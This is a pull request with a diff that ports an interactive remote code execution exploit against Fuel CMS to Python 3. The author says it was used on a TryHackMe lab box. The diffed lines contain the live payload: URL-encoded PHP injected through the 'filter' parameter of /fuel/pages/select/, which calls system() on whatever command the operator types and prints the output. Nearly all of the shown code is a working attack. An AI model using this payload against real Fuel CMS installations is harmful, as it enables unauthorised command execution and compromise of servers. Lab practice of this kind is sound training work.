### PR TITLE
Small change to get exploit to work on Kali 2021.3

### DIFF
--- a/exploit.py
+++ b/exploit.py
@@ -22,7 +22,7 @@ proxy = {"http" : "http://127.0.0.1:8080"} # Proxies you are behind (example is 
 
 while 1:
     command = input("$: ")
-    exploit_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(command)+"%27%29%2b%27"
+    exploit_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.parse.quote(command)+"%27%29%2b%27"
     r = requests.get(exploit_url, proxies=proxy)
 
     print(r.text[r.text.find("system")+6:r.text.find("<div ")])


### PR DESCRIPTION
I was working on the Ignite box on THM. This script was way more helpful than the ones already on exploit-db. Just needed a minor change for it to work in Kali 2021.3. Without this change I was getting this error:
`AttributeError: module 'urllib' has no attribute 'quote'
`
After the change was made, it worked great.
Notes:
https://stackoverflow.com/questions/31827012/python-importing-urllib-quote